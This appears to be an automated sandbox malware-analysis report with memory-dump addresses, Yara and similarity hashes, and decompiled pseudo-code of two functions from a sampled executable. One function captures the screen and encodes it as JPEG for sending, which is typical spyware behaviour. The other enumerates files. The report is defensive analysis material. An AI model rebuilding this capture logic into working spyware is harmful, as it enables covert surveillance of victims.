                                                                                                0x004372fa
                                                                                                0x004372f2
                                                                                                0x004372f5
                                                                                                0x004372f5
                                                                                                0x004372e2
                                                                                                0x004372e5
                                                                                                0x004372e5
                                                                                                0x004372d2
                                                                                                0x004372d5
                                                                                                0x004372d5
                                                                                                0x004372fd
                                                                                                0x00437300
                                                                                                0x00437303
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437305
                                                                                                0x00437308
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043730d
                                                                                                0x00437310
                                                                                                0x00437313
                                                                                                0x00437316
                                                                                                0x00437319
                                                                                                0x00437340
                                                                                                0x00437348
                                                                                                0x00437350
                                                                                                0x00437352
                                                                                                0x00437355
                                                                                                0x00437357
                                                                                                0x00437357
                                                                                                0x00437359
                                                                                                0x0043735a
                                                                                                0x0043735d
                                                                                                0x00000000
                                                                                                0x0043735d
                                                                                                0x0043731b
                                                                                                0x00437322
                                                                                                0x00437322
                                                                                                0x00437325
                                                                                                0x00437338
                                                                                                0x0043733b
                                                                                                0x00000000
                                                                                                0x0043733b
                                                                                                0x00437327
                                                                                                0x0043732a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043732c
                                                                                                0x0043732f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437331
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437333
                                                                                                0x00437336
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437336
                                                                                                0x0043731d
                                                                                                0x00437320
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437320
                                                                                                0x0043736b
                                                                                                0x00437370
                                                                                                0x00437373
                                                                                                0x00437375
                                                                                                0x00437383
                                                                                                0x00437389
                                                                                                0x00437391
                                                                                                0x00437393
                                                                                                0x004373c8
                                                                                                0x004373cc
                                                                                                0x004373ce
                                                                                                0x004373d0
                                                                                                0x004373d2
                                                                                                0x004373d2
                                                                                                0x004373d4
                                                                                                0x004373d4
                                                                                                0x004373d9
                                                                                                0x004373e2
                                                                                                0x004373e2
                                                                                                0x00000000
                                                                                                0x004373d9
                                                                                                0x0043739a
                                                                                                0x004373a0
                                                                                                0x004373a3
                                                                                                0x004373a5
                                                                                                0x004373af
                                                                                                0x004373b1
                                                                                                0x004373bc
                                                                                                0x004373bc
                                                                                                0x004373bf
                                                                                                0x004373b3
                                                                                                0x004373b3
                                                                                                0x004373b5
                                                                                                0x004373b5
                                                                                                0x004373c4
                                                                                                0x004373c4
                                                                                                0x00000000
                                                                                                0x004373c4
                                                                                                0x004373a7
                                                                                                0x004373aa
                                                                                                0x00000000
                                                                                                0x004373aa
                                                                                                0x0043737a
                                                                                                0x0043737d
                                                                                                0x0043737f
                                                                                                0x00000000
                                                                                                0x0043737f
                                                                                                0x00437259
                                                                                                0x0043725a
                                                                                                0x00000000
                                                                                                0x0043725a
                                                                                                0x00437251
                                                                                                0x00437214
                                                                                                0x00437216
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437216
                                                                                                0x0043716f
                                                                                                0x00437174
                                                                                                0x0043717a
                                                                                                0x00000000
                                                                                                0x0043717a

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$5{C
                                                                                                • API String ID: 1302938615-3679760776
                                                                                                • Opcode ID: 52ea4b79f5b1ed9fcbc3d66fe3a7d5c81c938f15fe1c964ea1d8387f698a4ab1
                                                                                                • Instruction ID: 7d73cbb27c0b51a22d9a2667e9ba6cb65d65831ca4aad46e164589b5038037b9
                                                                                                • Opcode Fuzzy Hash: 52ea4b79f5b1ed9fcbc3d66fe3a7d5c81c938f15fe1c964ea1d8387f698a4ab1
                                                                                                • Instruction Fuzzy Hash: FF91BBB19081499EDF34CEA9C4506EF7BB1AF59320F14A29BFCE197381D2389902DB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00414F9A, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 237COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E00414F9A(signed int __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v112;
				intOrPtr _v116;
				intOrPtr _v144;
				char _v184;
				char _v208;
				void* _v212;
				char _v232;
				void* _v236;
				char _v256;
				void* _v260;
				char _v280;
				void* _v284;
				char _v300;
				char _v304;
				char _v308;
				char _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				char _v352;
				intOrPtr _v356;
				char _v364;
				char _v380;
				char _v384;
				char _v392;
				void* _v404;
				signed int _v432;
				char _v448;
				char _v452;
				void* _v476;
				char _v480;
				intOrPtr _v484;
				char _v488;
				char _v492;
				char _v500;
				char _v504;
				char _v516;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t63;
				void* _t98;
				void* _t99;
				void* _t124;
				intOrPtr* _t125;
				char* _t133;
				intOrPtr _t191;
				intOrPtr* _t202;
				signed int _t214;
				void* _t216;
				void* _t217;

				_t186 = __edx;
				_t216 = (_t214 & 0xfffffff8) - 0x1ac;
				_push(_t124);
				_t207 = _a4;
				 *0x46de68 = _a4;
				_v432 = __ecx & 0x000000ff;
				E004152EA( &_v380, __edx, __eflags, _a4);
				if(E0040247B() != 0) {
					_t133 =  &_v380;
					_t63 =  *0x46dd00(E00401F87(_t133), E0040247B());
					_t125 = _t63;
					E00414E19( &_v364, _t125);
					E00415656(L"image/jpeg",  &_v300);
					_v356 = 1;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v336 = 1;
					_v332 = 4;
					_v328 =  &_v448;
					_t202 =  *0x46dd00(0, 0, _t133);
					E00414EB5( &_v308,  &_v380, _t202,  &_v308,  &_v364);
					 *((intOrPtr*)( *_t202 + 0x30))(_t202,  &_v112, 1);
					E004052FD(_t125,  &_v452,  &_v300, _t202, _v116, 0);
					asm("xorps xmm0, xmm0");
					asm("movlpd [esp+0x18], xmm0");
					 *((intOrPtr*)( *_t202 + 0x14))(_t202, _v484, _v480, 0, 0);
					_t210 =  *_t202;
					 *((intOrPtr*)( *_t202 + 0xc))(_t202, E00401F87( &_v480), _v144, 0);
					 *((intOrPtr*)( *_t125 + 8))(_t125);
					 *((intOrPtr*)( *_t202 + 8))(_t202);
					E0043CDA6( &_v504, E0040247B(),  &_v516, 0xa);
					_t217 = _t216 + 0xc;
					__eflags =  *0x46dd5e - 1;
					if( *0x46dd5e != 1) {
						__eflags =  *0x46e9ac - 0xffffffff;
						if(__eflags != 0) {
							E00402F85(_t125, _t217 - 0x18, E00405416( &_v384,  &_v492, __eflags, 0x46e250), __eflags,  &_v480);
							_push(0x4d);
							E00404BB7(_t125, 0x46e9a8, _t88, __eflags);
						} else {
							E00404943(0x46e9a8);
							E004049DE(0x46e9a8, _t210, 0x46e9a8);
							E00404CD4(0x46e9a8, E00415968);
							_t98 = E00417D2B( &_v392, 0x46e990);
							_t191 =  *0x46dd64; // 0x0
							_t99 = E00417C16(0x46e250,  &_v184, _t191);
							E00402F0F(_t217 - 0x18, E00402F85(0x46e250,  &_v352, E00402F0F( &_v328, E00402F85(0x46e250,  &_v304, E00402F85(0x46e250,  &_v280, E00402F85(0x46e250,  &_v256, E00402F85(0x46e250,  &_v232, E00405416( &_v208,  &_v500, __eflags, 0x46e250), __eflags,  &_v488), __eflags, 0x46e250), __eflags, 0x46e960), __eflags, 0x46e250), _t99), __eflags, 0x46e250), _t98);
							_push(0x10);
							E00404BB7(0x46e250, 0x46e9a8, _t107, __eflags);
							E00401FB9();
							E00401FB9();
							E00401FB9();
							E00401FB9();
							E00401FB9();
							E00401FB9();
							E00401FB9();
							E00401FB9();
						}
						E00401FB9();
					} else {
						E00404F18(0x46e9a8,  &_v300);
					}
					E00414E3F(E00401FB9(),  &_v452);
				} else {
					if( *0x46dd5e != 1) {
						__eflags =  *0x46e9ac - 0xffffffff;
						if(__eflags == 0) {
							E00404943(0x46e9a8);
							E004049DE(0x46e9a8, _t207, 0x46e9a8);
						}
						E004020DE(_t124, _t216 - 0x18, _t186, __eflags, 0x46e960);
						_push(0x4e);
						E00404BB7(_t124, 0x46e9a8, _t186, __eflags);
					} else {
						E00404F18(0x46e9a8, __edx);
					}
				}
				return E00401FB9();
			}





















































                                                                                                0x00414f9a
                                                                                                0x00414fa0
                                                                                                0x00414fa6
                                                                                                0x00414fa8
                                                                                                0x00414fb4
                                                                                                0x00414fba
                                                                                                0x00414fbe
                                                                                                0x00414fcf
                                                                                                0x0041502d
                                                                                                0x00415037
                                                                                                0x0041503e
                                                                                                0x00415045
                                                                                                0x00415056
                                                                                                0x00415067
                                                                                                0x0041506b
                                                                                                0x0041506c
                                                                                                0x0041506d
                                                                                                0x0041506e
                                                                                                0x00415071
                                                                                                0x0041507a
                                                                                                0x00415086
                                                                                                0x00415093
                                                                                                0x004150a7
                                                                                                0x004150b9
                                                                                                0x004150c8
                                                                                                0x004150cf
                                                                                                0x004150d4
                                                                                                0x004150e3
                                                                                                0x004150e6
                                                                                                0x004150fc
                                                                                                0x00415102
                                                                                                0x00415108
                                                                                                0x0041511c
                                                                                                0x00415121
                                                                                                0x00415124
                                                                                                0x0041512b
                                                                                                0x0041513c
                                                                                                0x00415143
                                                                                                0x004152aa
                                                                                                0x004152b0
                                                                                                0x004152b7
                                                                                                0x00415149
                                                                                                0x00415150
                                                                                                0x00415158
                                                                                                0x00415164
                                                                                                0x00415175
                                                                                                0x0041517a
                                                                                                0x00415193
                                                                                                0x00415215
                                                                                                0x0041521b
                                                                                                0x0041521f
                                                                                                0x0041522b
                                                                                                0x00415237
                                                                                                0x00415243
                                                                                                0x0041524f
                                                                                                0x0041525b
                                                                                                0x00415267
                                                                                                0x00415273
                                                                                                0x0041527f
                                                                                                0x0041527f
                                                                                                0x004152c3
                                                                                                0x0041512d
                                                                                                0x00415132
                                                                                                0x00415132
                                                                                                0x004152d5
                                                                                                0x00414fd1
                                                                                                0x00414fd8
                                                                                                0x00414fe9
                                                                                                0x00414ff5
                                                                                                0x00414ff9
                                                                                                0x00415001
                                                                                                0x00415001
                                                                                                0x00415010
                                                                                                0x00415015
                                                                                                0x00415019
                                                                                                0x00414fda
                                                                                                0x00414fdf
                                                                                                0x00414fdf
                                                                                                0x00414fd8
                                                                                                0x004152e9

                                                                                                APIs
                                                                                                  • Part of subcall function 004152EA: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415305
                                                                                                  • Part of subcall function 004152EA: CreateCompatibleDC.GDI32(00000000), ref: 00415311
                                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00415037
                                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 0041508D
                                                                                                  • Part of subcall function 00404F18: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E268,00000000,00404D9D,00000000,00000000,00000000,00000000,0046E268,0000000C), ref: 00404F22
                                                                                                  • Part of subcall function 00404F18: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F31
                                                                                                  • Part of subcall function 00404F18: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$Stream$CloseCompatibleEventHandleObjectSingleWait
                                                                                                • String ID: PF$image/jpeg
                                                                                                • API String ID: 609049557-165020994
                                                                                                • Opcode ID: e8dd95c5ae1285c96231e2f8295b617294261ce452ef78c50fa8684e79f70a0c
                                                                                                • Instruction ID: 540e87dd440121bbce44d66de5f7686fe6c773e4f572a5cc401b4b7bb25f6531
                                                                                                • Opcode Fuzzy Hash: e8dd95c5ae1285c96231e2f8295b617294261ce452ef78c50fa8684e79f70a0c
                                                                                                • Instruction Fuzzy Hash: EC81A0716082419BC324FB61D885AEFB3A8AFC5308F10452FF545A61D1EFB899498B4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00447BB9, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E00447BB9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E0043E203(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00439D83(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00437736();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E00440628(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E00439D83(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E00447F88(_a12, __eflags, _t213);
													E004414D5(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E00439D83(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00437736();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46c00c; // 0x4cc22724
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00450760(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00432D80(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00439350(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00447BA1);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E00430A5B(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E004414D5(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00450720( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00447F63( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E00438932();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00437709();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































                                                                                                0x00447bbe
                                                                                                0x00447bc1
                                                                                                0x00447bc7
                                                                                                0x00447bdf
                                                                                                0x00447be2
                                                                                                0x00447be6
                                                                                                0x00447be8
                                                                                                0x00447bea
                                                                                                0x00447bec
                                                                                                0x00447bef
                                                                                                0x00447bf2
                                                                                                0x00447bf5
                                                                                                0x00447bf7
                                                                                                0x00447c4f
                                                                                                0x00447c4f
                                                                                                0x00447c55
                                                                                                0x00447c57
                                                                                                0x00447c62
                                                                                                0x00447c66
                                                                                                0x00447c68
                                                                                                0x00447c6b
                                                                                                0x00447c6f
                                                                                                0x00447c6f
                                                                                                0x00447c71
                                                                                                0x00447c73
                                                                                                0x00447c75
                                                                                                0x00447c77
                                                                                                0x00447c77
                                                                                                0x00447c79
                                                                                                0x00447c7c
                                                                                                0x00447c7f
                                                                                                0x00447c7f
                                                                                                0x00447c81
                                                                                                0x00447c82
                                                                                                0x00447c82
                                                                                                0x00447c8d
                                                                                                0x00447c8f
                                                                                                0x00447c92
                                                                                                0x00447c93
                                                                                                0x00447c96
                                                                                                0x00447c96
                                                                                                0x00447c9a
                                                                                                0x00447c9d
                                                                                                0x00447ca0
                                                                                                0x00447ca0
                                                                                                0x00447cae
                                                                                                0x00447cb0
                                                                                                0x00447cb3
                                                                                                0x00447cb5
                                                                                                0x00447cbf
                                                                                                0x00447cc2
                                                                                                0x00447cc5
                                                                                                0x00447cc7
                                                                                                0x00447cca
                                                                                                0x00447ccc
                                                                                                0x00447d1c
                                                                                                0x00447d1f
                                                                                                0x00447d1f
                                                                                                0x00447d21
                                                                                                0x00000000
                                                                                                0x00447cce
                                                                                                0x00447cd0
                                                                                                0x00447cd0
                                                                                                0x00447cd2
                                                                                                0x00447cd5
                                                                                                0x00447cd5
                                                                                                0x00447cda
                                                                                                0x00447cdd
                                                                                                0x00447cdd
                                                                                                0x00447cdf
                                                                                                0x00447ce0
                                                                                                0x00447ce0
                                                                                                0x00447ce4
                                                                                                0x00447ce7
                                                                                                0x00447ce7
                                                                                                0x00447cea
                                                                                                0x00447ced
                                                                                                0x00447cfa
                                                                                                0x00447cff
                                                                                                0x00447d02
                                                                                                0x00447d04
                                                                                                0x00447d3e
                                                                                                0x00447d3f
                                                                                                0x00447d40
                                                                                                0x00447d41
                                                                                                0x00447d42
                                                                                                0x00447d43
                                                                                                0x00447d48
                                                                                                0x00447d4c
                                                                                                0x00447d4e
                                                                                                0x00447d4f
                                                                                                0x00447d52
                                                                                                0x00447d52
                                                                                                0x00447d55
                                                                                                0x00447d55
                                                                                                0x00447d57
                                                                                                0x00447d58
                                                                                                0x00447d58
                                                                                                0x00447d61
                                                                                                0x00447d62
                                                                                                0x00447d65
                                                                                                0x00447d68
                                                                                                0x00447d6b
                                                                                                0x00447d6d
                                                                                                0x00447d74
                                                                                                0x00447d76
                                                                                                0x00447d79
                                                                                                0x00447d83
                                                                                                0x00447d86
                                                                                                0x00447d87
                                                                                                0x00447d89
                                                                                                0x00447d9d
                                                                                                0x00447d9d
                                                                                                0x00447da0
                                                                                                0x00447daa
                                                                                                0x00447daf
                                                                                                0x00447db2
                                                                                                0x00447db4
                                                                                                0x00000000
                                                                                                0x00447db6
                                                                                                0x00447dba
                                                                                                0x00447dc3
                                                                                                0x00447dc9
                                                                                                0x00000000
                                                                                                0x00447dcc
                                                                                                0x00447d8b
                                                                                                0x00447d8b
                                                                                                0x00447d91
                                                                                                0x00447d96
                                                                                                0x00447d99
                                                                                                0x00447d9b
                                                                                                0x00447dd2
                                                                                                0x00447dd4
                                                                                                0x00447dd5
                                                                                                0x00447dd6
                                                                                                0x00447dd7
                                                                                                0x00447dd8
                                                                                                0x00447dd9
                                                                                                0x00447dde
                                                                                                0x00447de1
                                                                                                0x00447de2
                                                                                                0x00447de4
                                                                                                0x00447dea
                                                                                                0x00447df1
                                                                                                0x00447df4
                                                                                                0x00447df7
                                                                                                0x00447df8
                                                                                                0x00447dfb
                                                                                                0x00447dfc
                                                                                                0x00447dff
                                                                                                0x00447e00
                                                                                                0x00447e21
                                                                                                0x00447e21
                                                                                                0x00447e23
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447e08
                                                                                                0x00447e0a
                                                                                                0x00447e0c
                                                                                                0x00447e0e
                                                                                                0x00447e10
                                                                                                0x00447e12
                                                                                                0x00447e14
                                                                                                0x00447e1f
                                                                                                0x00000000
                                                                                                0x00447e1f
                                                                                                0x00447e14
                                                                                                0x00447e10
                                                                                                0x00000000
                                                                                                0x00447e0c
                                                                                                0x00447e25
                                                                                                0x00447e27
                                                                                                0x00447e2a
                                                                                                0x00447e43
                                                                                                0x00447e43
                                                                                                0x00447e45
                                                                                                0x00447e48
                                                                                                0x00447e58
                                                                                                0x00447e5a
                                                                                                0x00447e5a
                                                                                                0x00447e4a
                                                                                                0x00447e4a
                                                                                                0x00447e4d
                                                                                                0x00000000
                                                                                                0x00447e4f
                                                                                                0x00447e4f
                                                                                                0x00447e52
                                                                                                0x00000000
                                                                                                0x00447e54
                                                                                                0x00447e54
                                                                                                0x00447e54
                                                                                                0x00447e52
                                                                                                0x00447e4d
                                                                                                0x00447e68
                                                                                                0x00447e6c
                                                                                                0x00447e7a
                                                                                                0x00447e7f
                                                                                                0x00447e94
                                                                                                0x00447e96
                                                                                                0x00447e9c
                                                                                                0x00447e9f
                                                                                                0x00447ed1
                                                                                                0x00447ed1
                                                                                                0x00447ed6
                                                                                                0x00447edc
                                                                                                0x00447edc
                                                                                                0x00447ee3
                                                                                                0x00447efd
                                                                                                0x00447efd
                                                                                                0x00447efe
                                                                                                0x00447f04
                                                                                                0x00447f0a
                                                                                                0x00447f0b
                                                                                                0x00447f0c
                                                                                                0x00447f11
                                                                                                0x00447f14
                                                                                                0x00447f16
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447ee5
                                                                                                0x00447ee5
                                                                                                0x00447eeb
                                                                                                0x00447eed
                                                                                                0x00000000
                                                                                                0x00447eef
                                                                                                0x00447eef
                                                                                                0x00447ef2
                                                                                                0x00000000
                                                                                                0x00447ef4
                                                                                                0x00447ef4
                                                                                                0x00447efb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447efb
